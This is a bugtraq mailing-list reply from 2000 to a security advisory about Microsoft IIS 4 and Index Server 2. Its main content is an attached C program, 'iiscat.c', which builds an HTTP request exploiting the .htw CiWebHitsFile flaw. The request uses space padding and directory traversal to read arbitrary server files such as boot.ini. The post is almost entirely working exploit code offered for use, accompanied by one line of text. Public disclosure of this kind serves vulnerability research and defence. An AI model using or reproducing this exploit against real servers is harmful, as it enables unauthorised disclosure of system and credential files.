[13617] in bugtraq
Re: Alert: MS IIS 4 / IS 2 (Cerberus Security Advisory
daemon@ATHENA.MIT.EDU (Fredrik Widlund)
Mon Jan 31 16:49:53 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------331564A10B231623CB6D2F75"
Message-Id: <389482C3.13AA9429@defcom-sec.com>
Date: Sun, 30 Jan 2000 19:28:19 +0100
Reply-To: Fredrik Widlund <fredrik.widlund@DEFCOM-SEC.COM>
From: Fredrik Widlund <fredrik.widlund@DEFCOM-SEC.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
--------------331564A10B231623CB6D2F75
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
in plain english...
/wolf - Defcom Security
--------------331564A10B231623CB6D2F75
Content-Type: text/plain; charset=us-ascii;
name="iiscat.c"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="iiscat.c"
/*
fredrik.widlund@defcom-sec.com
example: iiscat ../../../../boot.ini
*/
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char request[2048], *request_p, *file_read, *file_valid = "/default.htm";
int file_buf_size = 250;
if (!((argc == 2 && argv[1] && strlen(argv[1]) < 1024) ||
(argc == 3 && argv[1] && argv[2] && strlen(argv[1]) <= file_buf_size && strlen(argv[2]) < 1024)))
{
fprintf(stderr, "usage: iiscat file_to_read [valid_file]\n");
exit(1);
}
file_read = argv[1];
if (argc == 3)
file_valid = argv[2];
sprintf(request, "GET %s", file_valid);
request_p = request + strlen(request);
file_buf_size -= strlen(file_valid);
while(file_buf_size)
{
strcpy(request_p, "%20");
request_p += 3;
file_buf_size--;
}
sprintf(request_p, ".htw?CiWebHitsFile=%s&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n", file_read);
puts(request);
exit(0);
}
--------------331564A10B231623CB6D2F75--
